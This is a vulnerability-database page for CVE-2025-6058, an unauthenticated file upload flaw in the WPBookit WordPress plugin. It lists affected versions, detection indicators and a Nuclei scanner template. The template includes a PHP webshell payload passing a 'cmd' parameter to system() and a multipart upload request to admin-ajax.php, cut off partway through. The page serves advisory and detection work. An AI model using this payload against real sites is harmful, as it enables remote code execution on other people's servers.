CVE-2025-6058
published 2025-07-12CVE-2025-6058: The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via…
PriorityP178critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
5.65%
92.0th percentile
The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_booking_type' route in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iqonic | wpbookit | < 1.0.5 | 1.0.5 |
| iqonicdesign | wpbookit | <= 1.0.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Alert on GET requests to /wp-content/uploads/**/*.php with a 'cmd' query parameter, indicating webshell execution after successful upload. ↗
- →Successful exploitation response contains both 'success' and 'status' strings in the JSON body from admin-ajax.php. ↗
- →Confirm RCE by matching the regex pattern for Unix uid/gid output in the HTTP response body: uid=\d+\([^)]+\) gid=\d+\([^)]+\) groups=\d+\([^)]+\) ↗
- ·The vulnerability is exploitable by unauthenticated attackers — no credentials or session tokens are required for the upload request. ↗
- ·Affected versions are 1.0.4 and below; the vulnerable function is image_upload_handle() hooked via the 'add_booking_type' route. ↗
- ·Uploaded PHP webshells land under /wp-content/uploads/ in a year/month subdirectory (e.g., YYYY/MM/), making the upload path time-dependent and requiring dynamic path construction for detection. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload
nuclei·CVSS 9.8
CVE-2025-6058 [CRITICAL] WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload
WPBookit "; if(isset($_GET["cmd"])){ echo ""; system($_GET["cmd"]); echo ""; } ?>'
cmd: 'id'
month: '{{date_time("%Y/%M")}}'
filename: "{{to_lower(rand_base(5))}}"
string: "{{to_lower(rand_base(8))}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "WPBookit")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="action"
wpb_ajax_post
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="route_name"
add_booking_typ
https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-booking-type-controller.php#L455https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3314288%40wpbookit&new=3314288%40wpbookit&sfp_email=&sfph_mail=https://www.wordfence.com/threat-intel/vulnerabilities/id/1d779ad1-fdbe-444c-85c5-99146a1a03d8?source=cve
2025-07-12
Published